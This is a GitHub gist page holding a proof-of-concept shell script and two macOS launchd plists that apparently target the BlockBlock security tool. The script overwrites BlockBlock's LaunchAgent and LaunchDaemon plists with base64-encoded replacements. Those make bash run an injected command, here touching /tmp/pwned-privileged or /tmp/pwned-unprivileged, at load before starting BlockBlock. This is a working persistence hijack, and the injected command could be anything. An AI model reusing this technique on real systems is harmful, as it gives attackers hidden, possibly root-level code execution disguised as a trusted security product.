Skip to content

Instantly share code, notes, and snippets.

@flipphillips

flipphillips/kk.sh

Created March 3, 2022 02:32
Show Gist options
  • Save flipphillips/42a3fa563eacb42a09bbee0cfcca30f7 to your computer and use it in GitHub Desktop.
Save flipphillips/42a3fa563eacb42a09bbee0cfcca30f7 to your computer and use it in GitHub Desktop.
Download ZIP

Revisions

  1. @pwnsdx pwnsdx revised this gist Aug 26, 2016. 2 changed files with 0 additions and 0 deletions.
    0 2-com.objectiveSee.blockblock.plist → x-com.objectiveSee.blockblock.plist
    View file
    File renamed without changes.
    0 1-com.objectiveSee.blockblock.plist → z-com.objectiveSee.blockblock.plist
    View file
    File renamed without changes.
  2. @pwnsdx pwnsdx created this gist Aug 26, 2016.
    17 changes: 17 additions & 0 deletions 1-com.objectiveSee.blockblock.plist
    View file
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,17 @@
    <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
    <plist version="1.0">
    <dict>
    <key>AbandonProcessGroup</key>
    <true/>
    <key>Label</key>
    <string>com.objectiveSee.blockblock.daemon</string>
    <key>ProgramArguments</key>
    <array>
    <string>bash</string>
    <string>-c</string>
    <string>touch /tmp/pwned-privileged; /Applications/BlockBlock.app/Contents/MacOS/BlockBlock daemon</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
    </dict>
    </plist>
    18 changes: 18 additions & 0 deletions 2-com.objectiveSee.blockblock.plist
    View file
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,18 @@
    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
    <plist version="1.0">
    <dict>
    <key>AbandonProcessGroup</key>
    <true/>
    <key>Label</key>
    <string>com.objectiveSee.blockblock.agent</string>
    <key>ProgramArguments</key>
    <array>
    <string>bash</string>
    <string>-c</string>
    <string>touch /tmp/pwned-unprivileged; /Applications/BlockBlock.app/Contents/MacOS/BlockBlock agent</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
    </dict>
    </plist>
    5 changes: 5 additions & 0 deletions kk.sh
    View file
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,5 @@
    # Inject malicious datas into BlockBlock plist (will create "pwned-unprivileged" file in /tmp) (unprivileged)
    (> ~/Library/LaunchAgents/com.objectiveSee.blockblock.plist; (echo "YnBsaXN0MDDUAQIDBAUGBQtfEBNBYmFuZG9uUHJvY2Vzc0dyb3VwXxAQUHJvZ3JhbUFyZ3VtZW50c1lSdW5BdExvYWRVTGFiZWwJowcICVRiYXNoUi1jXxBbdG91Y2ggL3RtcC9wd25lZC11bnByaXZpbGVnZWQ7IC9BcHBsaWNhdGlvbnMvQmxvY2tCbG9jay5hcHAvQ29udGVudHMvTWFjT1MvQmxvY2tCbG9jayBhZ2VudAlfECFjb20ub2JqZWN0aXZlU2VlLmJsb2NrYmxvY2suYWdlbnQIESc6REpLT1RXtbYAAAAAAAABAQAAAAAAAAAMAAAAAAAAAAAAAAAAAAAA2g==" | base64 --decode) > ~/Library/LaunchAgents/com.objectiveSee.blockblock.plist)

    # Inject malicious datas into BlockBlock plist (will create "pwned-privileged" file in /tmp) (privileged)
    (> /Library/LaunchDaemons/com.objectiveSee.blockblock.plist; (echo "YnBsaXN0MDDUAQIDBAUGBQtfEBNBYmFuZG9uUHJvY2Vzc0dyb3VwXxAQUHJvZ3JhbUFyZ3VtZW50c1lSdW5BdExvYWRVTGFiZWwJowcICVRiYXNoUi1jXxBadG91Y2ggL3RtcC9wd25lZC1wcml2aWxlZ2VkOyAvQXBwbGljYXRpb25zL0Jsb2NrQmxvY2suYXBwL0NvbnRlbnRzL01hY09TL0Jsb2NrQmxvY2sgZGFlbW9uCV8QImNvbS5vYmplY3RpdmVTZWUuYmxvY2tibG9jay5kYWVtb24IESc6REpLT1RXtLUAAAAAAAABAQAAAAAAAAAMAAAAAAAAAAAAAAAAAAAA2g==" | base64 --decode) > /Library/LaunchDaemons/com.objectiveSee.blockblock.plist)